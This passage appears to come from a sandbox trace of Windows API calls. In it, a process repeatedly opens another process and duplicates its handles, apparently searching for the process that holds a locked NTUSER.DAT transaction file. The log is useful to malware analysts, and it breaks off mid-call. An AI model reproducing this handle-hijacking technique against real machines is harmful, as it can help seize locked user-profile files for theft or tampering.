1 [0164.433] CloseHandle (hObject=0x194) returned 1 [0164.434] CloseHandle (hObject=0x1e8) returned 1 [0164.434] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.434] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x480, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.434] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.435] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.436] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.436] CloseHandle (hObject=0x1e4) returned 1 [0164.436] _wcsicmp (_Str1="\\SCHEDLGU.TXT", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0164.436] CloseHandle (hObject=0x194) returned 1 [0164.436] CloseHandle (hObject=0x1e8) returned 1 [0164.436] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.436] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x498, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.436] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.437] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.438] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.438] CloseHandle (hObject=0x1e4) returned 1 [0164.438] CloseHandle (hObject=0x194) returned 1 [0164.438] CloseHandle (hObject=0x1e8) returned 1 [0164.438] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.438] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x49c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.438] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.439] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.440] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.440] CloseHandle (hObject=0x1e4) returned 1 [0164.440] _wcsicmp (_Str1="\\atsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0164.440] CloseHandle (hObject=0x194) returned 1 [0164.440] CloseHandle (hObject=0x1e8) returned 1 [0164.440] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.440] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.440] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.441] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.442] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.442] CloseHandle (hObject=0x1e4) returned 1 [0164.442] _wcsicmp (_Str1="\\Tasks", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 6 [0164.442] CloseHandle (hObject=0x194) returned 1 [0164.442] CloseHandle (hObject=0x1e8) returned 1 [0164.442] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.442] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.442] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.443] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.444] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.444] CloseHandle (hObject=0x1e4) returned 1 [0164.444] _wcsicmp (_Str1="\\atsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0164.444] CloseHandle (hObject=0x194) returned 1 [0164.444] CloseHandle (hObject=0x1e8) returned 1 [0164.444] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.444] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.444] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.445] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.446] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.447] CloseHandle (hObject=0x1e4) returned 1 [0164.447] _wcsicmp (_Str1="\\atsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0164.447] CloseHandle (hObject=0x194) returned 1 [0164.447] CloseHandle (hObject=0x1e8) returned 1 [0164.447] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.447] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.447] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.448] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.448] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.449] CloseHandle (hObject=0x1e4) returned 1 [0164.449] CloseHandle (hObject=0x194) returned 1 [0164.449] CloseHandle (hObject=0x1e8) returned 1 [0164.449] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.449] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.449] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.450] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.450] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.450] CloseHandle (hObject=0x1e4) returned 1 [0164.451] CloseHandle (hObject=0x194) returned 1 [0164.451] CloseHandle (hObject=0x1e8) returned 1 [0164.451] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.451] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.451] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.453] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.453] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.454] CloseHandle (hObject=0x1e4) returned 1 [0164.454] _wcsicmp (_Str1="\\CatalogChangeListener-370-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -11 [0164.454] CloseHandle (hObject=0x194) returned 1 [0164.454] CloseHandle (hObject=0x1e8) returned 1 [0164.454] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.454] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.454] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.455] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.455] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.456] CloseHandle (hObject=0x1e4) returned 1 [0164.456] CloseHandle (hObject=0x194) returned 1 [0164.456] CloseHandle (hObject=0x1e8) returned 1 [0164.456] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.456] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.456] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.457] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.457] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.458] CloseHandle (hObject=0x1e4) returned 1 [0164.458] CloseHandle (hObject=0x194) returned 1 [0164.458] CloseHandle (hObject=0x1e8) returned 1 [0164.458] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.458] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x520, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.458] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.459] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.459] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.460] CloseHandle (hObject=0x1e4) returned 1 [0164.460] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0164.460] CloseHandle (hObject=0x194) returned 1 [0164.460] CloseHandle (hObject=0x1e8) returned 1 [0164.460] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.460] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5f0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.460] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.461] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.462] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.462] CloseHandle (hObject=0x1e4) returned 1 [0164.462] _wcsicmp (_Str1="\\MOF", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.462] CloseHandle (hObject=0x194) returned 1 [0164.462] CloseHandle (hObject=0x1e8) returned 1 [0164.462] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.462] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x68c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.462] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.463] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.464] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.464] CloseHandle (hObject=0x1e4) returned 1 [0164.464] CloseHandle (hObject=0x194) returned 1 [0164.464] CloseHandle (hObject=0x1e8) returned 1 [0164.464] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.464] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x788, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.464] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.465] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.466] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.466] CloseHandle (hObject=0x1e4) returned 1 [0164.466] CloseHandle (hObject=0x194) returned 1 [0164.466] CloseHandle (hObject=0x1e8) returned 1 [0164.466] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.466] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.466] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.467] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.468] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.468] CloseHandle (hObject=0x1e4) returned 1 [0164.468] CloseHandle (hObject=0x194) returned 1 [0164.468] CloseHandle (hObject=0x1e8) returned 1 [0164.468] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.468] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.468] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.469] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.470] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.470] CloseHandle (hObject=0x1e4) returned 1 [0164.470] CloseHandle (hObject=0x194) returned 1 [0164.470] CloseHandle (hObject=0x1e8) returned 1 [0164.470] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.470] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.470] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.471] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.472] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.472] CloseHandle (hObject=0x1e4) returned 1 [0164.472] CloseHandle (hObject=0x194) returned 1 [0164.472] CloseHandle (hObject=0x1e8) returned 1 [0164.472] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.472] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7f4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.472] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.473] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.474] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.474] CloseHandle (hObject=0x1e4) returned 1 [0164.474] CloseHandle (hObject=0x194) returned 1 [0164.474] CloseHandle (hObject=0x1e8) returned 1 [0164.474] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.474] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x8fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.474] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.475] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.475] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.475] CloseHandle (hObject=0x1e4) returned 1 [0164.476] _wcsicmp (_Str1="\\srvsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0164.476] CloseHandle (hObject=0x194) returned 1 [0164.476] CloseHandle (hObject=0x1e8) returned 1 [0164.476] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.476] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x954, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.476] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.477] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.478] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.478] CloseHandle (hObject=0x1e4) returned 1 [0164.478] _wcsicmp (_Str1="\\MAPPING1.MAP", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.478] CloseHandle (hObject=0x194) returned 1 [0164.478] CloseHandle (hObject=0x1e8) returned 1 [0164.478] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.478] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x958, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.478] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.479] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.480] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.480] CloseHandle (hObject=0x1e4) returned 1 [0164.480] _wcsicmp (_Str1="\\MAPPING2.MAP", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.480] CloseHandle (hObject=0x194) returned 1 [0164.480] CloseHandle (hObject=0x1e8) returned 1 [0164.480] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.480] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x95c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.480] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.481] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.482] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.482] CloseHandle (hObject=0x1e4) returned 1 [0164.482] _wcsicmp (_Str1="\\MAPPING3.MAP", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.482] CloseHandle (hObject=0x194) returned 1 [0164.482] CloseHandle (hObject=0x1e8) returned 1 [0164.482] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.482] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x960, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.482] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.483] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.483] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.484] CloseHandle (hObject=0x1e4) returned 1 [0164.484] _wcsicmp (_Str1="\\OBJECTS.DATA", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 1 [0164.484] CloseHandle (hObject=0x194) returned 1 [0164.484] CloseHandle (hObject=0x1e8) returned 1 [0164.484] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.484] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x964, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.484] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.485] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.486] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.486] CloseHandle (hObject=0x1e4) returned 1 [0164.486] _wcsicmp (_Str1="\\INDEX.BTR", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -5 [0164.486] CloseHandle (hObject=0x194) returned 1 [0164.486] CloseHandle (hObject=0x1e8) returned 1 [0164.486] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.486] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x9a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.486] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.487] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.487] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.487] CloseHandle (hObject=0x1e4) returned 1 [0164.488] _wcsicmp (_Str1="\\srvsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0164.488] CloseHandle (hObject=0x194) returned 1 [0164.488] CloseHandle (hObject=0x1e8) returned 1 [0164.488] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.488] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa70, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, 